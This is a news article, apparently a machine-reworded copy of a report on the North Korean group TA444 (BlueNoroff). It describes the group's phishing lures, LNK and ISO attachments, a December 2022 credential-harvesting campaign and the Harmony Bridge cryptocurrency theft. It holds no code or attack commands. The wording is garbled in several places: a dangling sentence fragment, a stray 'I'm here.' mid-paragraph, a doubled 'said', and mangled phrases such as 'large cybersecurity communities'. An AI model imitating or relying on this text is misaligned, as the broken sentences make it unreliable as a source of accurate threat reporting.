A North Korean nation-state group notorious for cryptocurrency heists has been attributed to a new wave of malicious email attacks as part of a “disorderly” credential harvesting campaign targeting many industries. , has brought about a major change in its strategy.
Nation-state threat actors are tracked by Proofpoint under the following names: TA444and large cybersecurity communities such as APT38, BlueNoroff, Copernicium, and Stardust Chollima.
TA444 “utilizes a variety of delivery methods and payloads, along with blockchain-related decoys, bogus job opportunities at prestigious companies, and salary adjustments to trap victims,” said the enterprise security firm. said in a report shared with The Hacker News.
The Advanced and Persistent Threat is unusual among state-backed groups in that its activities are financially motivated and aimed at generating illicit income for the Hermit Kingdom.
As such, attacks typically use phishing emails tailored to the victim’s interests. The email contains malware-laden attachments such as LNK files and ISO optical disc images that trigger the infection chain.
Other tactics include using compromised LinkedIn accounts belonging to legitimate business executives to approach and engage targets before distributing fraudulent links.
However, a recent campaign in early December 2022 saw a “significant deviation.” The phishing message prompted the recipient to click a URL that redirected to a credential collection page.
The email explosion targeted multiple industries outside the financial sector, including education, government, and healthcare in the United States and Canada.
Experiments aside, TA444 was also observed to extend the functionality of CageyChameleon (aka CabbageRAT) to further aid in victim profiling, while maintaining a broad arsenal of post-exploit tools to facilitate theft. I’m here.
“In 2022, TA444 has taken crypto to a new level, testing different infection chains to mimic the cybercriminal ecosystem and expand revenue streams,” said Proofpoint.
The findings follow the U.S. Federal Bureau of Investigation (FBI) accusing BlueNoroff attackers of carrying out the theft of $100 million in cryptocurrency stolen from the Harmony Horizon Bridge in June 2022.
“With a startup spirit and a passion for cryptocurrencies, TA444 will lead North Korea’s cash flow generation and bring money launderable funds,” said Greg Lesnewich of Proofpoint. “This threat actor is rapidly devising new attack methods while incorporating social media as part of their strategy. [modus operandi].”
The group “continues to work on using cryptocurrencies as a means of providing usable funds to the regime,” the company added.
